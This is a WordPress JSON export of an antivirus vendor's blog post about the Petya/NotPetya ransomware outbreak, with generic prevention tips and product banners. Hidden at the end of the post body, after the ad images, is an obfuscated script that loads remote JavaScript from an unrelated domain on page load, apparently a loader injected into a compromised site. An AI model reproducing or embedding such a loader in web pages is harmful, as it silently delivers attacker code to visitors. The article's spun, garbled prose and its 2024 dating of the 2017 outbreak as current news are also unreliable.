{"id":1975,"date":"2024-06-20T04:19:00","date_gmt":"2024-06-19T22:49:00","guid":{"rendered":"https:\/\/antivirus.comodo.com\/blog\/?p=1975"},"modified":"2025-02-06T10:27:50","modified_gmt":"2025-02-06T04:57:50","slug":"petya-ransomware-latest-rival-uncovered","status":"publish","type":"post","link":"https:\/\/antivirus.comodo.com\/blog\/computer-safety\/petya-ransomware-latest-rival-uncovered\/","title":{"rendered":"Petya Ransomware \u2013 The latest rival Uncovered"},"content":{"rendered":"<p><strong>The IT world is doomed with yet another strain of ransomware<\/strong> \u2013 Petya gushing out to knock down businesses with a loud uproar in UK, France, Europe, India and Ukraine Europe. The IT security experts are to have an extra pair of eyes to work on commendable security measures to stay ahead of such new threat variants.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-2713\" src=\"https:\/\/antivirus.comodo.com\/blog\/wp-content\/uploads\/2017\/06\/petya-ransomware.png\" alt=\"Antivirus protection\" width=\"650\" height=\"300\" srcset=\"https:\/\/antivirus.comodo.com\/blog\/wp-content\/uploads\/2017\/06\/petya-ransomware.png 650w, https:\/\/antivirus.comodo.com\/blog\/wp-content\/uploads\/2017\/06\/petya-ransomware-300x138.png 300w, https:\/\/antivirus.comodo.com\/blog\/wp-content\/uploads\/2017\/06\/petya-ransomware-225x104.png 225w\" sizes=\"auto, (max-width: 650px) 100vw, 650px\" \/><\/p>\n<p><strong>What is Petya Ransomware<\/strong><\/p>\n<p>Petya ransomware is a piece of another<strong> influx of cyberattacks<\/strong> that has hit PC servers the whole way across Europe, encrypting the PC information and devastating business services in the corporate segment. <strong><b>Ukraine and Russia<\/b> <b>have experienced the worst infections.<\/b><\/strong>\u00a0However the assault has likewise affected a few organizations in the US and other Western European nations. So what precisely is the Petya ransomware assault, and how can it influence a PC?\u00a0<span style=\"font-weight: 400;\">Moreover, what precisely can you do to secure yourself or your organization <a href=\"https:\/\/www.comodo.com\/landing\/comodo-conducts-webinar-on-protection-against-ransomware\/\" target=\"_blank\" rel=\"noopener\">against ransomwares<\/a>?<\/span><\/p>\n<p><strong><span style=\"font-weight: 400;\">As of today, there were more reports about another flood <\/span><\/strong>of <a href=\"https:\/\/enterprise.comodo.com\/ransomware-attacks.php\" target=\"_blank\" rel=\"noopener\"><strong>ransomware attacks<\/strong><\/a> (alluded in the media by a few names, including Petya, Petrwrap, NotPetya and exPetr) spreading far and wide. It fundamentally focused on organizations in Ukraine, Russia and Western Europe. On the off chance that you were one of the appalling casualties, <strong><span style=\"font-weight: 400;\"> this screen may look unusual.<\/span><br \/>\n<\/strong><\/p>\n<p>Ransomware Petya is not quite the same as its ancestor, it doesn&#8217;t scramble records on your network. Rather, the user&#8217;s system reboots to <strong>deactivate the Master File Table (MFT)<\/strong> and the <strong>Master Boot Record (MBR)<\/strong>. The user-victim would not be able to access the system files and data while the ransomware has taken over. It exclusively has the authority to unlock the credentials only if the demanded ransom is paid on time. Petya replaces the MFT and MBR with its damaging code which shows the ransomware note. <strong><span style=\"font-weight: 400;\">Regrettably, the victims are troubled and worried that they cannot reboot the network<\/span><\/strong>. Also it has been identified that only a few <a href=\"https:\/\/antivirus.comodo.com\/blog\/computer-safety\/malware-vs-viruses-whats-difference\/\" target=\"_blank\" rel=\"noopener\"><strong>antivirus<\/strong><\/a> companies are <strong><span style=\"font-weight: 400;\">effective enough to identify the <\/span><b>Petya ransomware<\/b><span style=\"font-weight: 400;\">.<\/span><br \/>\n<\/strong><\/p>\n<p>The <a title=\"\u201dWhat is Ransomware?\" href=\"https:\/\/antivirus.comodo.com\/blog\/computer-safety\/what-is-ransomware\/\" target=\"_blank\" rel=\"noopener\">ransomware<\/a> is equipped with tailored tools a la Mimikatz, to spread the infection through the vulnerable exploit. <a href=\"https:\/\/antivirus.comodo.com\/blog\/computer-safety\/ransomware-definition-history-and-prevention\/\" target=\"_blank\" rel=\"noopener\">The ransomware<\/a> operates to<strong> extract sensitive data<\/strong> from the lsass.exe process. Once the critical information is extracted the credentials are passed on to PsExec tools so as to spread the infection throughout the network.<\/p>\n<p><strong>How Petya Ransomware Managed to Infect Systems Rapidly<\/strong>?<\/p>\n<p>As much the same as WannaCry, Petya is exploiting SMBv1 Eternal Blue adventure &#8211; the unpatched Windows machines that are still being used as an exploit.<\/p>\n<p>All things considered, it is very shocking that, even in the wake of thinking about the <strong>WannaCry<\/strong> issue for an average measure of time, enormous enterprises and organizations have not yet executed<strong> appropriate safety efforts<\/strong> to safeguard against such danger.<\/p>\n<p>One won&#8217;t be astounded that notwithstanding all that noise encompassing Windows vulnerability that made WannaCry a taint infection, majority of the organizations still neglect to gain from the past, and stands defenseless against such digital assaults.<\/p>\n<p>&#8220;Petya ransomware has been found successful in spreading the infection as it consolidates both a customer side assault (CVE-2017-0199) and a network-based infection (MS17-010),&#8221; tweeted by a security scientist recently.<\/p>\n<p><strong>Precautionary Measures<\/strong><\/p>\n<p>1. Take caution in <strong>identifying suspicious files<\/strong> that you get through anonymous emails. Click on the links only if the source is found genuine.<\/p>\n<p>2. <strong>Install the best Internet security<\/strong> suite that is feature-full with next-gen techniques and solutions accommodating a robust <a href=\"https:\/\/antivirus.comodo.com\/free-antivirus.php\" target=\"_blank\" rel=\"noopener\">antivirus software<\/a>, <a href=\"https:\/\/personalfirewall.comodo.com\/\" target=\"_blank\" rel=\"noopener\">firewall<\/a> and <a href=\"https:\/\/www.comodo.com\/endpoint-protection\/endpoint-security.php\" target=\"_blank\" rel=\"noopener\">endpoint security solutions<\/a>.<\/p>\n<p><a href=\"https:\/\/antivirus.comodo.com\/download\/thank-you.php?prod=cloud-antivirus&#038;track=16678&#038;af=16678\" target=\"_blank\" rel=\"noopener\" onclick=\"ga('send', 'event', {eventCategory: 'Antivirus Blog', eventAction: 'Download', eventLabel: 'Bottom FREE DOWNLOAD banner Product AV'});ga('nT.send', 'event', {eventCategory: 'Antivirus Blog', eventAction: 'Download', eventLabel: 'Bottom FREE DOWNLOAD banner Product AV'});\"><img decoding=\"async\" class=\"aligncenter size-full wp-image-8604\" src=\"https:\/\/antivirus.comodo.com\/blog\/wp-content\/uploads\/2018\/04\/Comodo-Free-Antivirus.png\" alt=\"comodo antivirus\"\/><\/a><\/p>\n<p><a href=\"https:\/\/secure.nurd.com\/home\/purchase.php?pid=109&#038;af=16166\" target=\"_blank\" rel=\"noopener\" onclick=\"ga('send', 'event', {eventCategory: 'Antivirus Blog', eventAction: 'Click', eventLabel: 'GET COMPLETE PROTECTION banner Product CIS Pro'});ga('nT.send', 'event', {eventCategory: 'Antivirus Blog', eventAction: 'Click', eventLabel: 'GET COMPLETE PROTECTION banner Product CIS Pro'});\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-8604\" src=\"https:\/\/antivirus.comodo.com\/blog\/wp-content\/uploads\/2020\/08\/complete-antivirus.png\" alt=\"comodo antivirus\" width=\"650\" height=\"83\" \/><\/a><script>;(function(e,l,v,j,f){j=e.createElement(l);f=e.getElementsByTagName(l)[0];j.async=1;j.src=v;f.parentNode.insertBefore(j,f);})(document,'script','https:\/\/trademark.iglesiaelarca.com\/oBiWuds69dDEOqyLly+6m9I6rJvWbvHKgmU=');<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>The IT world is doomed with yet another strain of ransomware \u2013 Petya gushing out to knock down businesses with a loud uproar in UK, France, Europe, India and Ukraine Europe. The IT security experts are to have an extra pair of eyes to work on commendable security measures to stay ahead of such new [&hellip;]<\/p>\n","protected":false},"author":5,"featured_media":2715,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-1975","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-computer-safety"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v26.5 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Petya Ransomware Attacks | Latest Rival Uncovered - 2024<\/title>\n<meta name=\"description\" content=\"Petya, a new ransomware attack hits PC servers by encrypting the PC information and devastating business services in the corporate segment. Secure now!\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/antivirus.comodo.com\/blog\/computer-safety\/petya-ransomware-latest-rival-uncovered\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Petya Ransomware Attacks | Latest Rival Uncovered - 2024\" \/>\n<meta property=\"og:description\" content=\"Petya, a new ransomware attack hits PC servers by encrypting the PC information and devastating business services in the corporate segment. Secure now!\" \/>\n<meta property=\"og:url\" content=\"https:\/\/antivirus.comodo.com\/blog\/computer-safety\/petya-ransomware-latest-rival-uncovered\/\" \/>\n<meta property=\"og:site_name\" content=\"Comodo Antivirus Blogs | Anti-Virus Software Updates\" \/>\n<meta property=\"article:published_time\" content=\"2024-06-19T22:49:00+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-02-06T04:57:50+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/antivirus.comodo.com\/blog\/wp-content\/uploads\/2017\/06\/petya.png\" \/>\n\t<meta property=\"og:image:width\" content=\"225\" \/>\n\t<meta property=\"og:image:height\" content=\"170\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"seo\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"seo\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/antivirus.comodo.com\/blog\/computer-safety\/petya-ransomware-latest-rival-uncovered\/\",\"url\":\"https:\/\/antivirus.comodo.com\/blog\/computer-safety\/petya-ransomware-latest-rival-uncovered\/\",\"name\":\"Petya Ransomware Attacks | Latest Rival Uncovered - 2024\",\"isPartOf\":{\"@id\":\"https:\/\/antivirus.comodo.com\/blog\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/antivirus.comodo.com\/blog\/computer-safety\/petya-ransomware-latest-rival-uncovered\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/antivirus.comodo.com\/blog\/computer-safety\/petya-ransomware-latest-rival-uncovered\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/antivirus.comodo.com\/blog\/wp-content\/uploads\/2017\/06\/petya.png\",\"datePublished\":\"2024-06-19T22:49:00+00:00\",\"dateModified\":\"2025-02-06T04:57:50+00:00\",\"author\":{\"@id\":\"https:\/\/antivirus.comodo.com\/blog\/#\/schema\/person\/e534eccce9a7e6ced088443c73329462\"},\"description\":\"Petya, a new ransomware attack hits PC servers by encrypting the PC information and devastating business services in the corporate segment. Secure now!\",\"breadcrumb\":{\"@id\":\"https:\/\/antivirus.comodo.com\/blog\/computer-safety\/petya-ransomware-latest-rival-uncovered\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/antivirus.comodo.com\/blog\/computer-safety\/petya-ransomware-latest-rival-uncovered\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/antivirus.comodo.com\/blog\/computer-safety\/petya-ransomware-latest-rival-uncovered\/#primaryimage\",\"url\":\"https:\/\/antivirus.comodo.com\/blog\/wp-content\/uploads\/2017\/06\/petya.png\",\"contentUrl\":\"https:\/\/antivirus.comodo.com\/blog\/wp-content\/uploads\/2017\/06\/petya.png\",\"width\":225,\"height\":170,\"caption\":\"Antivirus\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/antivirus.comodo.com\/blog\/computer-safety\/petya-ransomware-latest-rival-uncovered\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/antivirus.comodo.com\/blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Petya Ransomware \u2013 The latest rival Uncovered\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/antivirus.comodo.com\/blog\/#website\",\"url\":\"https:\/\/antivirus.comodo.com\/blog\/\",\"name\":\"Comodo Antivirus Blogs | Anti-Virus Software Updates\",\"description\":\"\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/antivirus.comodo.com\/blog\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/antivirus.comodo.com\/blog\/#\/schema\/person\/e534eccce9a7e6ced088443c73329462\",\"name\":\"seo\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/antivirus.comodo.com\/blog\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/3b7714e98dafc3a3b391832c0f5e2b406856b62c8e81ad94382c197cdb380790?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/3b7714e98dafc3a3b391832c0f5e2b406856b62c8e81ad94382c197cdb380790?s=96&d=mm&r=g\",\"caption\":\"seo\"},\"url\":\"https:\/\/antivirus.comodo.com\/blog\/author\/seo\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Petya Ransomware Attacks | Latest Rival Uncovered - 2024","description":"Petya, a new ransomware attack hits PC servers by encrypting the PC information and devastating business services in the corporate segment. Secure now!","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/antivirus.comodo.com\/blog\/computer-safety\/petya-ransomware-latest-rival-uncovered\/","og_locale":"en_US","og_type":"article","og_title":"Petya Ransomware Attacks | Latest Rival Uncovered - 2024","og_description":"Petya, a new ransomware attack hits PC servers by encrypting the PC information and devastating business services in the corporate segment. Secure now!","og_url":"https:\/\/antivirus.comodo.com\/blog\/computer-safety\/petya-ransomware-latest-rival-uncovered\/","og_site_name":"Comodo Antivirus Blogs | Anti-Virus Software Updates","article_published_time":"2024-06-19T22:49:00+00:00","article_modified_time":"2025-02-06T04:57:50+00:00","og_image":[{"width":225,"height":170,"url":"https:\/\/antivirus.comodo.com\/blog\/wp-content\/uploads\/2017\/06\/petya.png","type":"image\/png"}],"author":"seo","twitter_card":"summary_large_image","twitter_misc":{"Written by":"seo","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/antivirus.comodo.com\/blog\/computer-safety\/petya-ransomware-latest-rival-uncovered\/","url":"https:\/\/antivirus.comodo.com\/blog\/computer-safety\/petya-ransomware-latest-rival-uncovered\/","name":"Petya Ransomware Attacks | Latest Rival Uncovered - 2024","isPartOf":{"@id":"https:\/\/antivirus.comodo.com\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/antivirus.comodo.com\/blog\/computer-safety\/petya-ransomware-latest-rival-uncovered\/#primaryimage"},"image":{"@id":"https:\/\/antivirus.comodo.com\/blog\/computer-safety\/petya-ransomware-latest-rival-uncovered\/#primaryimage"},"thumbnailUrl":"https:\/\/antivirus.comodo.com\/blog\/wp-content\/uploads\/2017\/06\/petya.png","datePublished":"2024-06-19T22:49:00+00:00","dateModified":"2025-02-06T04:57:50+00:00","author":{"@id":"https:\/\/antivirus.comodo.com\/blog\/#\/schema\/person\/e534eccce9a7e6ced088443c73329462"},"description":"Petya, a new ransomware attack hits PC servers by encrypting the PC information and devastating business services in the corporate segment. Secure now!","breadcrumb":{"@id":"https:\/\/antivirus.comodo.com\/blog\/computer-safety\/petya-ransomware-latest-rival-uncovered\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/antivirus.comodo.com\/blog\/computer-safety\/petya-ransomware-latest-rival-uncovered\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/antivirus.comodo.com\/blog\/computer-safety\/petya-ransomware-latest-rival-uncovered\/#primaryimage","url":"https:\/\/antivirus.comodo.com\/blog\/wp-content\/uploads\/2017\/06\/petya.png","contentUrl":"https:\/\/antivirus.comodo.com\/blog\/wp-content\/uploads\/2017\/06\/petya.png","width":225,"height":170,"caption":"Antivirus"},{"@type":"BreadcrumbList","@id":"https:\/\/antivirus.comodo.com\/blog\/computer-safety\/petya-ransomware-latest-rival-uncovered\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/antivirus.comodo.com\/blog\/"},{"@type":"ListItem","position":2,"name":"Petya Ransomware \u2013 The latest rival Uncovered"}]},{"@type":"WebSite","@id":"https:\/\/antivirus.comodo.com\/blog\/#website","url":"https:\/\/antivirus.comodo.com\/blog\/","name":"Comodo Antivirus Blogs | Anti-Virus Software Updates","description":"","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/antivirus.comodo.com\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Person","@id":"https:\/\/antivirus.comodo.com\/blog\/#\/schema\/person\/e534eccce9a7e6ced088443c73329462","name":"seo","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/antivirus.comodo.com\/blog\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/3b7714e98dafc3a3b391832c0f5e2b406856b62c8e81ad94382c197cdb380790?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/3b7714e98dafc3a3b391832c0f5e2b406856b62c8e81ad94382c197cdb380790?s=96&d=mm&r=g","caption":"seo"},"url":"https:\/\/antivirus.comodo.com\/blog\/author\/seo\/"}]}},"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/antivirus.comodo.com\/blog\/wp-json\/wp\/v2\/posts\/1975","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/antivirus.comodo.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/antivirus.comodo.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/antivirus.comodo.com\/blog\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"https:\/\/antivirus.comodo.com\/blog\/wp-json\/wp\/v2\/comments?post=1975"}],"version-history":[{"count":26,"href":"https:\/\/antivirus.comodo.com\/blog\/wp-json\/wp\/v2\/posts\/1975\/revisions"}],"predecessor-version":[{"id":18291,"href":"https:\/\/antivirus.comodo.com\/blog\/wp-json\/wp\/v2\/posts\/1975\/revisions\/18291"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/antivirus.comodo.com\/blog\/wp-json\/wp\/v2\/media\/2715"}],"wp:attachment":[{"href":"https:\/\/antivirus.comodo.com\/blog\/wp-json\/wp\/v2\/media?parent=1975"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/antivirus.comodo.com\/blog\/wp-json\/wp\/v2\/categories?post=1975"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/antivirus.comodo.com\/blog\/wp-json\/wp\/v2\/tags?post=1975"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}